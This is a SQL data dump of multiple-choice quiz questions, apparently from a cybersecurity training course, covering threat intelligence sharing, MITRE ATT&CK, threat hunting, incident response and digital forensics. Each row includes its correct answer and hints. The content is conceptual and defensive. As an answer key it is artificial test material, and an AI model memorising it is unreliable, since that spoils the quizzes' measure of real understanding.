(7030, 776, 'Why check a file hash on VirusTotal?', 8, 'To see if other vendors have already detected it', 0, 'Community intelligence.', '2025-12-29 13:38:32', '[\"To download the virus\", \"To see if other vendors have already detected it\", \"To delete the internet\", \"To hack Google\"]'),
(7031, 776, 'Pestudio is primarily used for...', 9, 'Static Analysis', 0, 'Analyzing PE headers/strings.', '2025-12-29 13:38:32', '[\"Dynamic Analysis\", \"Static Analysis\", \"Writing Reports\", \"Chatting\"]'),
(7032, 776, 'Ransomware typically does what?', 10, 'Encrypts files and demands payment', 0, 'Encryption for extortion.', '2025-12-29 13:38:32', '[\"Encrypts files and demands payment\", \"Steals passwords\", \"Mines crypto\", \"Shows ads\"]'),
(7033, 777, 'Which is an example of an IOC?', 1, 'A known malicious file hash', 0, 'Static evidence.', '2025-12-29 13:38:32', '[\"High CPU usage\", \"A known malicious file hash\", \"Slow network\", \"A user logging in\"]'),
(7034, 777, 'Which indicator focuses on \"Behavior\" and \"Intent\"?', 2, 'IOA', 0, 'Indicator of Attack.', '2025-12-29 13:38:32', '[\"IOC\", \"IOA\", \"URL\", \"IP\"]'),
(7035, 777, 'Which is harder for an attacker to change?', 3, 'Their Behavior/Tactics (IOA)', 0, 'Changing TTPs requires retraining.', '2025-12-29 13:38:32', '[\"Their IP address\", \"Their File Hash\", \"Their Behavior/Tactics (IOA)\", \"Their Domain\"]'),
(7036, 778, 'Can you verify TLP:RED intel with a third party?', 1, 'No - never', 0, 'Verified only with source.', '2025-12-29 13:38:32', '[\"Yes\", \"No - never\", \"Only if you trust them\", \"Maybe\"]'),
(7037, 778, 'Which TLP level allows sharing with the general public?', 2, 'CLEAR', 0, 'White/Clear = Public.', '2025-12-29 13:38:32', '[\"CLEAR\", \"GREEN\", \"AMBER\", \"RED\"]'),
(7038, 778, 'TLP:AMBER allows sharing with...', 3, 'Your organization and clients on need-to-know basis', 0, 'Restricted distribution.', '2025-12-29 13:38:32', '[\"The internet\", \"Your organization and clients on need-to-know basis\", \"Only 1 person\", \"Anyone\"]'),
(7039, 779, 'What does STIX stand for?', 1, 'Structured Threat Information Expression', 0, 'Standard language for CTI.', '2025-12-29 13:38:32', '[\"Structured Threat Information Expression\", \"Standard Text Info X\", \"Secure Threat Intel Xchange\", \"Simple Text Index\"]'),
(7040, 779, 'What is TAXII?', 2, 'The transport mechanism for STIX', 0, 'Trusted Automated Exchange of Intelligence Information.', '2025-12-29 13:38:32', '[\"The transport mechanism for STIX\", \"A cab service\", \"A file format\", \"A virus\"]');
INSERT INTO `lesson_questions` (`id`, `task_id`, `question_text`, `question_order`, `correct_answer`, `case_sensitive`, `hint`, `created_at`, `options`) VALUES
(7041, 779, 'Which is an IOC?', 3, '192.168.1.1 (C2 IP)', 0, 'Artifact.', '2025-12-29 13:38:32', '[\"192.168.1.1 (C2 IP)\", \"Port Scanning Activity\", \"Pass the Hash Attack\", \"Phishing Methodology\"]'),
(7042, 779, 'Which is an IOA?', 4, 'Cred Dumping from LSASS', 0, 'Behavior.', '2025-12-29 13:38:32', '[\"File Hash\", \"Cred Dumping from LSASS\", \"Domain Name\", \"Email Subject\"]'),
(7043, 779, 'TLP:RED means...', 5, 'Not for disclosure, restricted to specific recipients', 0, 'Most restrictive.', '2025-12-29 13:38:32', '[\"Share with everyone\", \"Share with community\", \"Not for disclosure, restricted to specific recipients\", \"Share with Org\"]'),
(7044, 779, 'If you receive TLP:GREEN info, can you post it on Twitter?', 6, 'No', 0, 'Twitter = Public (CLEAR). Green is Community.', '2025-12-29 13:38:32', '[\"Yes\", \"No\", \"Only if anonymous\", \"If its cool\"]'),
(7045, 779, 'Why use Standards like STIX?', 7, 'To allow automated machine-to-machine sharing', 0, 'Interoperability.', '2025-12-29 13:38:32', '[\"To make things complicated\", \"To allow automated machine-to-machine sharing\", \"To encrypt data\", \"To hide info\"]'),
(7046, 779, 'David Bianco\'s Pyramid of Pain places what at the top (Hardest for attacker)?', 8, 'TTPs (Tactics, Techniques, Procedures)', 0, 'Behavior is hardest to change.', '2025-12-29 13:38:32', '[\"Hash Values\", \"IP Addresses\", \"TTPs (Tactics, Techniques, Procedures)\", \"Domain Names\"]'),
(7047, 779, 'Who manages the TLP standard?', 9, 'FIRST.org', 0, 'Forum of Incident Response and Security Teams.', '2025-12-29 13:38:32', '[\"FIRST.org\", \"Google\", \"Microsoft\", \"Nobody\"]'),
(7048, 779, 'An IP Address in the Pyramid of Pain is...', 10, 'Easy to change (Low Pain)', 0, 'Attacker just rents a new VPS.', '2025-12-29 13:38:32', '[\"Easy to change (Low Pain)\", \"Impossible to change\", \"Tough\", \"Annoying\"]'),
(7049, 780, 'In MITRE ATT&CK, \"Initial Access\" is a...', 1, 'Tactic (Goal)', 0, 'The \'Why\'.', '2025-12-29 13:38:32', '[\"Tactic (Goal)\", \"Technique (Method)\", \"Procedure\", \"Tool\"]'),
(7050, 780, 'In MITRE ATT&CK, \"Spearphishing Attachment\" is a...', 2, 'Technique', 0, 'The \'How\'.', '2025-12-29 13:38:32', '[\"Tactic\", \"Technique\", \"Procedure\", \"Matrix\"]'),
(7051, 780, 'What does the matrix help defenders do?', 3, 'Map defenses against real-world threats', 0, 'Gap analysis.', '2025-12-29 13:38:32', '[\"Map defenses against real-world threats\", \"Install virus\", \"Hack back\", \"Guess passwords\"]'),
(7052, 781, 'What is the Navigator used for?', 1, 'Visualizing/Heatmapping the matrix', 0, 'Annotating layers.', '2025-12-29 13:38:32', '[\"Visualizing/Heatmapping the matrix\", \"Browsing the web\", \"GPS\", \"Chatting\"]'),
(7053, 781, 'If you color techniques used by Ransomware red, you are doing...', 2, 'Threat Modeling / Emulation Planning', 0, 'Visualizing the adversary.', '2025-12-29 13:38:32', '[\"Threat Modeling / Emulation Planning\", \"Defensive Coverage\", \"Coding\", \"Patching\"]'),
(7054, 781, 'Where can you access Navigator?', 3, 'Github / MITRE Website', 0, 'It is an open web app.', '2025-12-29 13:38:32', '[\"Github / MITRE Website\", \"Dark Web\", \"Only offline\", \"App Store\"]'),
(7055, 782, 'What is a \"Tactic\" in ATT&CK?', 1, 'The adversary\'s technical goal (The Why)', 0, 'High level objective.', '2025-12-29 13:38:32', '[\"The adversary\'s technical goal (The Why)\", \"The specific command\", \"The tool used\", \"The IP address\"]'),
(7056, 782, 'What is a \"Technique\"?', 2, 'How the goal is achieved', 0, 'The method.', '2025-12-29 13:38:32', '[\"How the goal is achieved\", \"The goal itself\", \"The date of attack\", \"The victim\"]'),
(7057, 782, '\"Persistence\" is an example of...', 3, 'Tactic', 0, 'Staying in the system.', '2025-12-29 13:38:32', '[\"Tactic\", \"Technique\", \"Software\", \"Actor\"]'),
(7058, 782, '\"Registry Run Keys\" is an example of...', 4, 'Technique', 0, 'A way to achieve Persistence.', '2025-12-29 13:38:32', '[\"Technique\", \"Tactic\", \"Procedure\", \"MITRE\"]'),
(7059, 782, 'What is \"Sub-Technique\"?', 5, 'A more specific implementation of a technique', 0, 'e.g., T1059.001 (PowerShell) under Command Scripting.', '2025-12-29 13:38:32', '[\"A more specific implementation of a technique\", \"A smaller tactic\", \"A tool\", \"A user\"]'),
(7060, 782, 'Why is Mapping to MITRE important?', 6, 'It provides a common language for defenders and red teams', 0, 'Standardization.', '2025-12-29 13:38:32', '[\"It provides a common language for defenders and red teams\", \"It is fun\", \"It is required for windows updates\", \"It prevents all hacks\"]'),
(7061, 782, 'Who maintains ATT&CK?', 7, 'MITRE Corp', 0, 'Federally Funded R&D Center.', '2025-12-29 13:38:32', '[\"MITRE Corp\", \"Microsoft\", \"Google\", \"FBI\"]'),
(7062, 782, 'What does the \"Enterprise\" matrix cover?', 8, 'Windows, Linux, macOS, Cloud networks', 0, 'Standard IT networks.', '2025-12-29 13:38:32', '[\"Windows, Linux, macOS, Cloud networks\", \"Mobile phones only\", \"Satellites\", \"Cars\"]'),
(7063, 782, 'Can Navigator export layers?', 9, 'Yes, as JSON or SVG', 0, 'For sharing.', '2025-12-29 13:38:32', '[\"Yes, as JSON or SVG\", \"No\", \"Only PDF\", \"Only PNG\"]'),
(7064, 782, 'ATT&CK is based on...', 10, 'Real-world observations', 0, 'Evidence based.', '2025-12-29 13:38:32', '[\"Real-world observations\", \"Theoretical hacks\", \"Sci-fi movies\", \"Random guesses\"]'),
(7065, 783, 'What is the primary difference between SOC and Threat Hunting?', 1, 'SOC is Reactive, Hunting is Proactive', 0, 'Alerts vs Search.', '2025-12-29 13:38:32', '[\"SOC is Reactive, Hunting is Proactive\", \"SOC works at night\", \"Hunting uses guns\", \"No difference\"]'),
(7066, 783, 'What does \"Assume Breach\" mean?', 2, 'Assume the network is compromised and look for evidence', 0, 'Proactive stance.', '2025-12-29 13:38:32', '[\"Assume the network is compromised and look for evidence\", \"Breach the network yourself\", \"Assume security is perfect\", \"Give up\"]'),
(7067, 783, 'What metric does Hunting aim to reduce?', 3, 'Dwell Time', 0, 'Time undetected.', '2025-12-29 13:38:32', '[\"Dwell Time\", \"Cost\", \"False Positives\", \"Ping\"]'),
(7068, 784, 'In \"Stacking\", where is the malicious activity usually found?', 1, 'The Long Tail (Least Frequent)', 0, 'Malware is the anomaly.', '2025-12-29 13:38:32', '[\"The Long Tail (Least Frequent)\", \"The Short Stack (Most Frequent)\", \"The Middle\", \"Everywhere\"]'),
(7069, 784, 'What is \"Stacking\" also known as?', 2, 'Frequency Analysis', 0, 'Counting stats.', '2025-12-29 13:38:32', '[\"Frequency Analysis\", \"Stack Overflow\", \"Heap Spray\", \"Sorting\"]'),
(7070, 784, 'Clustering helps to...', 3, 'Identify outliers by grouping similar items', 0, 'Finding the odd one out.', '2025-12-29 13:38:32', '[\"Identify outliers by grouping similar items\", \"Encrypt data\", \"Delete logs\", \"Generate alerts\"]'),
(7071, 785, 'Defining a Hypothesis is the first step of...', 1, 'A Structured Hunt', 0, 'Hypothesis-Driven Hunting.', '2025-12-29 13:38:32', '[\"A Structured Hunt\", \"Incident Response\", \"Malware Analysis\", \"Patching\"]'),
(7072, 785, 'Which is a valid Hypothesis?', 2, 'APT29 uses PowerShell for lateral movement', 0, 'Specific and testable proposition.', '2025-12-29 13:38:32', '[\"APT29 uses PowerShell for lateral movement\", \"I will find bad stuff\", \"PowerShell is bad\", \"Updates are essential\"]'),
(7073, 785, 'If you stack \"User Agents\", which one is fast investigation?', 3, 'Python-urllib/2.7 (Count: 1)', 0, 'Low count + suspicious string = Priority.', '2025-12-29 13:38:32', '[\"Mozilla/5.0 (Windows NT 10.0)... (Count: 5000)\", \"Python-urllib/2.7 (Count: 1)\", \"Chrome/90 (Count: 4000)\", \"Edge/89 (Count: 2000)\"]'),
(7074, 785, 'What separates Hunting from Incident Response?', 4, 'Hunting looks for unknown threats; IR handles known incidents', 0, 'Discovery vs Reaction.', '2025-12-29 13:38:32', '[\"Hunting looks for unknown threats; IR handles known incidents\", \"Hunting is faster\", \"IR is cheaper\", \"Hunting is automated\"]'),
(7075, 785, 'The \"Baseline\" is...', 5, 'Known Good behavior', 0, 'You need to know what is Normal to find what is Abnormal.', '2025-12-29 13:38:32', '[\"Known Good behavior\", \"Known Bad behavior\", \"A firewall rule\", \"A password\"]'),
(7076, 785, 'What is a \"Pivot\"?', 6, 'Moving from one data point to another related one', 0, 'e.g., Domain -> IP -> Other Domains.', '2025-12-29 13:38:32', '[\"Moving from one data point to another related one\", \"Turning around\", \"Deleting a row\", \"Closing a ticket\"]'),
(7077, 785, 'Checking for \"Beaconing\" traffic is analyzing...', 7, 'Regular interval communications (Heartbeats)', 0, 'C2 callbacks.', '2025-12-29 13:38:32', '[\"Regular interval communications (Heartbeats)\", \"Large file downloads\", \"SQL Injection\", \"Password failures\"]'),
(7078, 785, 'Least Frequency Analysis is effective for finding...', 8, 'Rare events', 0, 'Outliers.', '2025-12-29 13:38:32', '[\"Rare events\", \"Common events\", \"System files\", \"Updates\"]'),
(7079, 785, 'A \"Hunt\" should always result in...', 9, 'Ideally a detection rule or improved visibility', 0, 'Improving the security posture regardless of finding a breach.', '2025-12-29 13:38:32', '[\"Ideally a detection rule or improved visibility\", \"A verified breach\", \"Firing someone\", \"Installing an antivirus\"]'),
(7080, 785, 'Assume Breach implies...', 10, 'Defenses can fail', 0, 'Accepting risk.', '2025-12-29 13:38:32', '[\"Defenses can fail\", \"Defenses act perfectly\", \"Hackers are lazy\", \"Firewalls stop everything\"]'),
(7081, 786, 'What involves confirming multiple feeds reporting the same indicator?', 1, 'Deduplication/Correlation', 0, 'Merging duplicates.', '2025-12-29 13:38:32', '[\"Deduplication/Correlation\", \"Encryption\", \"Deletion\", \"Scanning\"]'),
(7082, 786, 'Why \"Enrich\" an indicator?', 2, 'To add context (e.g., GeoIP, ASM Info, Rep Score)', 0, 'Context aids decision making.', '2025-12-29 13:38:32', '[\"To add context (e.g., GeoIP, ASM Info, Rep Score)\", \"To make it expensive\", \"To encrypt it\", \"To hide it\"]'),
(7083, 786, 'Pushing IOCs to a SIEM is part of...', 3, 'Integration / Dissemination', 0, 'Actioning the intel.', '2025-12-29 13:38:32', '[\"Integration / Dissemination\", \"Collection\", \"Planning\", \"Analysis\"]'),
(7084, 787, 'In MISP, what represents a \"Threat Actor\" or \"Mitre Technique\"?', 1, 'Galaxy / Tag', 0, 'Contextual metadata.', '2025-12-29 13:38:32', '[\"Galaxy / Tag\", \"Attribute\", \"Event\", \"User\"]'),
(7085, 787, 'The top-level container in MISP is an...', 2, 'Event', 0, 'Events contain attributes.', '2025-12-29 13:38:32', '[\"Event\", \"Attribute\", \"Object\", \"Server\"]'),
(7086, 787, 'MISP allows you to...', 3, 'Share and Sync intelligence with other organizations', 0, 'Community sharing.', '2025-12-29 13:38:32', '[\"Share and Sync intelligence with other organizations\", \"Scan viruses\", \"Hack websites\", \"Manage passwords\"]'),
(7087, 788, 'Which is a popular Graph-based TIP?', 1, 'OpenCTI', 0, 'Knowledge Graph platform.', '2025-12-29 13:38:32', '[\"OpenCTI\", \"Notepad++\", \"Calculator\", \"Outlook\"]'),
(7088, 788, 'What is the benefit of a Knowledge Graph (OpenCTI)?', 2, 'Visualizing complex relationships between entities', 0, 'Graph theory.', '2025-12-29 13:38:32', '[\"Visualizing complex relationships between entities\", \"Saving disk space\", \"Faster typing\", \"Cheaper hosting\"]'),
(7089, 788, 'Why \"Normalize\" data in a TIP?', 3, 'To store diverse feeds in a consistent format', 0, 'Standardization.', '2025-12-29 13:38:32', '[\"To store diverse feeds in a consistent format\", \"To delete it\", \"To encrypt it\", \"To hide source\"]'),
(7090, 788, 'If you have zero budget, which TIP is best?', 4, 'MISP (Open Source)', 0, 'Free and open source.', '2025-12-29 13:38:32', '[\"MISP (Open Source)\", \"Splunk Enterprise\", \"Recorded Future\", \"CrowdStrike\"]'),
(7091, 788, 'What is an \"IoC Decay\" or \"Expiration\"?', 5, 'Retiring an indicator when it is no longer malicious', 0, 'Lifecycle management.', '2025-12-29 13:38:32', '[\"Retiring an indicator when it is no longer malicious\", \"Deleting files\", \"Password expiry\", \"Server crash\"]'),
(7092, 788, 'Enrichment Connectors typically query...', 6, 'External APIs (VirusTotal, AlienVault)', 0, 'Third party data.', '2025-12-29 13:38:32', '[\"External APIs (VirusTotal, AlienVault)\", \"Local files\", \"Printers\", \"Keyboards\"]'),
(7093, 788, 'Sharing an Event in MISP creates a...', 7, 'Distributed warning to the community', 0, 'Collective defense.', '2025-12-29 13:38:32', '[\"Distributed warning to the community\", \"Security breach\", \"Firewall rule\", \"False positive\"]'),
(7094, 788, 'Can a TIP automate firewall blocking?', 8, 'Yes, via integration/orchestration', 0, 'SOAR capabilities.', '2025-12-29 13:38:32', '[\"Yes, via integration/orchestration\", \"No, never\", \"Only if manual\", \"Only on Tuesdays\"]'),
(7095, 788, 'Attributes in MISP can be marked as...', 9, 'to_ids (Actionable for IDS)', 0, 'Flag indicating if it should be exported to security controls.', '2025-12-29 13:38:32', '[\"to_ids (Actionable for IDS)\", \"Private\", \"Deleted\", \"Fun\"]'),
(7096, 788, 'STIX 2.0 uses what format?', 10, 'JSON', 0, 'Modern standard.', '2025-12-29 13:38:32', '[\"JSON\", \"XML\", \"CSV\", \"Binary\"]'),
(7097, 789, 'What is BLUF?', 1, 'Bottom Line Up Front', 0, 'Conclusion first.', '2025-12-29 13:38:32', '[\"Bottom Line Up Front\", \"Blue Light\", \"Bottom Left\", \"Big Line\"]'),
(7098, 789, 'Who is the audience for a \"Strategic\" report?', 2, 'Executives', 0, 'Decision makers.', '2025-12-29 13:38:32', '[\"Executives\", \"SOC Analysts\", \"Engineers\", \"Hackers\"]'),
(7099, 789, 'Why use \"Estimative Language\"?', 3, 'To standardize uncertainty and confidence', 0, 'Clarity of probability.', '2025-12-29 13:38:32', '[\"To standardize uncertainty and confidence\", \"To sound smart\", \"To confuse people\", \"To avoid liability\"]'),
(7100, 790, 'Which statement uses proper Estimative Language?', 1, 'It is LIKELY that APT29 is responsible', 0, 'Standard term.', '2025-12-29 13:38:32', '[\"It is LIKELY that APT29 is responsible\", \"Maybe it is APT29\", \"I believe it is APT29\", \"It is 100% APT29\"]'),
(7101, 790, 'Strategic Reports should focus on...', 2, 'Business Risk and Impact', 0, 'Executive view.', '2025-12-29 13:38:32', '[\"Business Risk and Impact\", \"IP Addresses\", \"Malware code\", \"Logs\"]'),
(7102, 790, 'Tactical Reports should focus on...', 3, 'Actionable IOCs and Rules', 0, 'Defender view.', '2025-12-29 13:38:32', '[\"Actionable IOCs and Rules\", \"Financial loss\", \"Geopolitics\", \"Trends\"]'),
(7103, 790, 'What is \"Words of Estimative Probability\" (WEP)?', 4, 'Standard terms to convey likelihood', 0, 'Intelligence standard.', '2025-12-29 13:38:32', '[\"Standard terms to convey likelihood\", \"A spell check tool\", \"A thesaurus\", \"A translation\"]'),
(7104, 790, 'A report with 50 pages of technical details should usually include...', 5, 'An Executive Summary (BLUF)', 0, 'For the busy reader.', '2025-12-29 13:38:32', '[\"An Executive Summary (BLUF)\", \"A poem\", \"No summary\", \"Pictures of cats\"]'),
(7105, 790, 'Dissemination via API is best for...', 6, 'Speed and Automation', 0, 'Machine consumption.', '2025-12-29 13:38:32', '[\"Speed and Automation\", \"Executives\", \"Legal Reviews\", \"Press Releases\"]'),
(7106, 790, 'Feedback in the intel cycle ensures...', 7, 'Relevance and Improvement', 0, 'Quality control.', '2025-12-29 13:38:32', '[\"Relevance and Improvement\", \"Payment\", \"Deletion\", \"Encryption\"]'),
(7107, 790, 'If you have Low Confidence, you should...', 8, 'State it clearly', 0, 'Honesty in analysis.', '2025-12-29 13:38:32', '[\"State it clearly\", \"Lie\", \"Say High Confidence\", \"Say nothing\"]'),
(7108, 790, 'Intelligence Requirements (IRs) drive the...', 9, 'Entire Intelligence Cycle', 0, 'The starting point.', '2025-12-29 13:38:32', '[\"Entire Intelligence Cycle\", \"Lunch menu\", \"Server updates\", \"HR policy\"]'),
(7109, 790, 'Which is NOT a goal of reporting?', 10, 'To confuse the reader', 0, 'Clarity is King.', '2025-12-29 13:38:32', '[\"To confuse the reader\", \"To inform decisions\", \"To warn of threats\", \"To document findings\"]'),
(7110, 791, 'Which phase of the incident response lifecycle involves creating an Incident Response Plan (IRP) and deploying security tools?', 1, 'Preparation', 0, 'This happens before an incident ever occurs.', '2026-03-09 22:28:54', '[\"Eradication\",\"Containment\",\"Identification\",\"Preparation\"]'),
(7111, 791, 'During which phase do you isolate an infected endpoint from the corporate network?', 2, 'Containment', 0, 'You are trying to stop the spread of the infection.', '2026-03-09 22:28:54', '[\"Lessons Learned\",\"Containment\",\"Recovery\",\"Identification\"]'),
(7112, 791, 'What does the acronym PICERL stand for? (Enter the 6 words separated by spaces)', 3, 'Preparation Identification Containment Eradication Recovery Lessons Learned', 0, 'P I C E R LL', '2026-03-09 22:28:54', '[\"Prepare Investigate Contain Eradicate Recover Learn\",\"Protect Identify Contain Erase Restore Learn\",\"Plan Identify Contain Eradicate Recover Learn\",\"Preparation Identification Containment Eradication Recovery Lessons Learned\"]'),
(7113, 791, 'In which phase do you patch the vulnerability that the attacker originally exploited?', 4, 'Eradication', 0, 'Removing the root cause and the malware itself.', '2026-03-09 22:28:54', '[\"Containment\",\"Identification\",\"Recovery\",\"Eradication\"]'),
(7114, 791, 'Reviewing SIEM alerts to determine if an event is a false positive or a true security breach happens in which phase?', 5, 'Identification', 0, 'You are detecting and confirming the threat.', '2026-03-09 22:28:54', '[\"Preparation\",\"Lessons Learned\",\"Containment\",\"Identification\"]'),
(7115, 792, 'Which branch of digital forensics focuses on analyzing packets to track data exfiltration or Command and Control traffic?', 1, 'Network Forensics', 0, 'Analyzing traffic traversing wires or airwaves.', '2026-03-09 22:28:54', '[\"Disk Forensics\",\"Network Forensics\",\"Memory Forensics\",\"Mobile Forensics\"]'),
(7116, 792, 'Which branch of forensics analyzes running processes and decrypted passwords that would be lost if the machine was rebooted?', 2, 'Memory Forensics', 0, 'Also known as RAM forensics.', '2026-03-09 22:28:54', '[\"Network Forensics\",\"Disk Forensics\",\"Mobile Forensics\",\"Memory Forensics\"]'),
(7117, 792, 'Which forensics tool is considered the industry standard for Memory Forensics? (Mentioned in the reading)', 3, 'Volatility', 0, 'Starts with V.', '2026-03-09 22:28:54', '[\"Autopsy\",\"Wireshark\",\"Volatility\",\"EnCase\"]'),
(7118, 792, 'Taking a bit-by-bit exact copy of a hard drive is primarily associated with which branch of forensics?', 4, 'Disk Forensics', 0, 'Also known as Computer Forensics.', '2026-03-09 22:28:54', '[\"Memory Forensics\",\"Disk Forensics\",\"Mobile Forensics\",\"Network Forensics\"]'),
(7119, 792, 'What is the primary conflict between Business Operations and the Forensics team during an incident?', 5, 'Speed vs Preservation', 0, 'The business wants to go fast, forensics wants to save evidence.', '2026-03-09 22:28:54', '[\"Open Source vs Commercial Tools\",\"Speed vs Preservation\",\"Cost vs Quality\",\"Internal vs External Threat\"]'),
(7120, 793, 'What is the chronological, written record detailing the control and transfer of evidence called?', 1, 'Chain of Custody', 0, 'It proves who had the evidence and when.', '2026-03-09 22:28:54', '[\"Evidence Ledger\",\"Incident Report\",\"Chain of Custody\",\"Writ of Possession\"]'),
(7121, 793, 'What mathematical technique is used to create a digital fingerprint of a file to prove it has not been altered?', 2, 'Hashing', 0, 'Examples include MD5 or SHA-256.', '2026-03-09 22:28:54', '[\"Encoding\",\"Compression\",\"Encryption\",\"Hashing\"]'),
(7122, 793, 'If you change a single pixel in an image file, will the SHA-256 hash of that file remain the same or change?', 3, 'Change', 0, 'Even the smallest alteration completely changes the output.', '2026-03-09 22:28:54', '[\"Remain the same\",\"It depends on the image format\",\"Change\",\"SHA-256 ignores pixels\"]'),
(7123, 793, 'What device or software is used to ensure that a suspect\'s hard drive is not accidentally modified during the imaging process?', 4, 'Write Blocker', 0, 'It blocks write commands but allows read commands.', '2026-03-09 22:28:54', '[\"Firewall\",\"Disk Wiper\",\"Write Blocker\",\"Read/Write Head\"]'),
(7124, 793, 'If the Chain of Custody is broken, what is the most likely consequence in a legal proceeding?', 5, 'Inadmissible', 0, 'The evidence cannot be used in court.', '2026-03-09 22:28:54', '[\"Inadmissible\",\"The forensic analyst is fined\",\"The judge must review it personally\",\"The evidence becomes stronger\"]'),
(7125, 794, 'Which forensic principle states that \"Every contact leaves a trace\"?', 1, 'Locards Exchange Principle', 0, 'Named after Dr. Edmond Locard.', '2026-03-09 22:28:54', '[\"Order of Volatility\",\"Locards Exchange Principle\",\"Heisenberg Uncertainty Principle\",\"Principle of Least Privilege\"]'),
(7126, 794, 'According to the Order of Volatility, which should be collected FIRST: the contents of the Hard Drive or the System Memory (RAM)?', 2, 'System Memory', 0, 'It is more volatile than persistent storage.', '2026-03-09 22:28:54', '[\"System Memory\",\"Hard Drive\",\"They should be collected simultaneously\",\"It does not matter\"]'),
(7127, 794, 'If an attacker runs a fileless malware that only exists in active memory, what happens to that malware if you reboot the server?', 3, 'It is destroyed', 0, 'RAM requires power to maintain its data.', '2026-03-09 22:28:54', '[\"It is destroyed\",\"It migrates to the hard drive\",\"It connects to the C2 server\",\"It hides in the boot sector\"]'),
(7128, 794, 'Which is the LEAST volatile source of evidence in the standard order of volatility: RAM, Hard Drive, or Archival Media (Backups)?', 4, 'Archival Media', 0, 'Backups last for years and don\'t change.', '2026-03-09 22:28:54', '[\"RAM\",\"Archival Media\",\"Network Logs\",\"Hard Drive\"]'),
(7129, 794, 'In modern incident response, why is it generally a bad idea to \"pull the power plug\" on a compromised server immediately? (One word related to what you lose)', 5, 'RAM', 0, 'You lose volatile memory.', '2026-03-09 22:28:54', '[\"RAM\",\"Network Logs\",\"Hard Drive\",\"CPU\"]'),
(7130, 795, 'When you first arrive on the scene of a powered-off suspect laptop, what should your immediate first step be?', 1, 'Do not turn it on', 0, 'Booting changes file timestamps.', '2026-03-09 22:28:54', '[\"Do not turn it on\",\"Turn it on to see if it works\",\"Pull the battery out\",\"Attempt to guess the password\"]'),
(7131, 795, 'Why is it dangerous to attempt guessing the password on a locked smartphone or BitLocker-encrypted drive?', 2, 'It may wipe the encryption keys', 0, 'Security features protect the data.', '2026-03-09 22:28:54', '[\"It alerts the attacker\",\"It uses up the battery too fast\",\"It may wipe the encryption keys\",\"It creates unnecessary log files\"]'),
(7132, 795, 'If you find a mobile phone that is suspected to be involved in a crime, what is the best way to prevent the suspect from remotely wiping it?', 3, 'Place it in a Faraday bag', 0, 'Block all radio signals.', '2026-03-09 22:28:54', '[\"Turn it off immediately\",\"Place it in a Faraday bag\",\"Uninstall all apps\",\"Plug it into a charger\"]'),
(7133, 795, 'Why should you avoid using the built-in tools (like Task Manager) on a compromised machine during a live response?', 4, 'They may be compromised by a rootkit', 0, 'You cannot trust the OS anymore.', '2026-03-09 22:28:54', '[\"They do not show network connections\",\"They are not fast enough\",\"They may be compromised by a rootkit\",\"They take up too much RAM\"]'),
(7134, 795, 'What should you do before disconnecting any cables from the back of a suspect\'s computer tower?', 5, 'Take photographs', 0, 'Document the original state.', '2026-03-09 22:28:54', '[\"Check for malware\",\"Wipe the hard drive\",\"Write down the MAC address\",\"Take photographs\"]'),
(7135, 796, 'Which type of acquisition copies only the files visible to the operating system, missing deleted data?', 1, 'Logical', 0, 'It uses the OS logic.', '2026-03-09 22:28:54', '[\"Bit-stream\",\"Physical\",\"Raw\",\"Logical\"]'),
(7136, 796, 'Which type of acquisition reads the raw 1s and 0s directly from the hardware, capturing deleted files in unallocated space?', 2, 'Physical', 0, 'Also known as a bit-stream image.', '2026-03-09 22:28:54', '[\"Volume\",\"Physical\",\"Targeted\",\"Logical\"]'),
(7137, 796, 'What device intercepts commands to prevent a forensic workstation from accidentally altering a suspect\'s hard drive?', 3, 'Write Blocker', 0, 'It blocks write operations.', '2026-03-09 22:28:54', '[\"Write Blocker\",\"Read-Only Memory\",\"Hardware Firewall\",\"Read Blocker\"]'),
(7138, 796, 'Which forensic image format is the industry standard that includes compression, metadata, and built-in hashes?', 4, 'E01', 0, 'Associated with EnCase.', '2026-03-09 22:28:54', '[\"RAW\",\"DD\",\"ISO\",\"E01\"]'),
(7139, 796, 'If you plug a suspect\'s Windows hard drive directly into another Windows machine without protection, what happens to the evidence?', 5, 'It is altered', 0, 'Windows mounts it automatically.', '2026-03-09 22:28:54', '[\"It is altered\",\"Nothing happens\",\"It is encrypted\",\"It copies itself\"]'),
(7140, 797, 'What type of malware executes directly in memory and leaves almost zero trace on the physical hard drive?', 1, 'Fileless Malware', 0, 'It exists without files.', '2026-03-09 22:28:54', '[\"Ransomware\",\"Fileless Malware\",\"Bootkit\",\"Macro Virus\"]'),
(7141, 797, 'Which Windows file contains a perfect snapshot of the RAM contents dumped to the hard drive when the computer goes to sleep?', 2, 'hiberfil.sys', 0, 'Starts with h.', '2026-03-09 22:28:54', '[\"ntuser.dat\",\"pagefile.sys\",\"swapfile.sys\",\"hiberfil.sys\"]'),
(7142, 797, 'What happens to the decryption keys for a BitLocker encrypted drive while the computer is powered on and unlocked?', 3, 'Stored in RAM', 0, 'The system needs them actively.', '2026-03-09 22:28:54', '[\"Sent to the cloud\",\"Stored in RAM\",\"Deleted immediately\",\"Written to the registry\"]'),
(7143, 797, 'Which phenomenon occurs because the contents of RAM change during the time it takes to create a memory image?', 4, 'Smear Effect', 0, 'Like taking a panoramic photo of a moving object.', '2026-03-09 22:28:54', '[\"Bit Flipping\",\"Buffer Overflow\",\"Memory Leak\",\"Smear Effect\"]'),
(7144, 797, 'Which tool is commonly used to extract a full memory dump from a running Linux system?', 5, 'LiME', 0, 'Acronym for Linux Memory Extractor.', '2026-03-09 22:28:54', '[\"DumpIt\",\"FTK Imager\",\"WinPmem\",\"LiME\"]'),
(7145, 798, 'What type of network evidence records the complete payload and headers of every packet sent across the wire?', 1, 'Full Packet Capture', 0, 'Abbreviated as PCAP.', '2026-03-09 22:28:54', '[\"DNS Queries\",\"Full Packet Capture\",\"NetFlow\",\"Firewall Logs\"]'),
(7146, 798, 'What type of network evidence acts like a \"phone bill,\" recording metadata like IPs, ports, and bytes transferred, but NOT the payload?', 2, 'NetFlow', 0, 'Telemetry data.', '2026-03-09 22:28:54', '[\"Syslog\",\"PCAP\",\"NetFlow\",\"SNMP\"]'),
(7147, 798, 'Which hardware device is physically inserted inline with a network cable to passively duplicate traffic for forensic capture?', 3, 'Network Tap', 0, 'It taps into the physical line.', '2026-03-09 22:28:54', '[\"SPAN Port\",\"Network Tap\",\"Router\",\"Network Switch\"]'),
(7148, 798, 'A switch feature that copies traffic from one port to a monitoring port for analysis is called a...?', 4, 'SPAN Port', 0, 'Also known as Port Mirroring.', '2026-03-09 22:28:54', '[\"VLAN\",\"Trunk Port\",\"SPAN Port\",\"VPN\"]'),
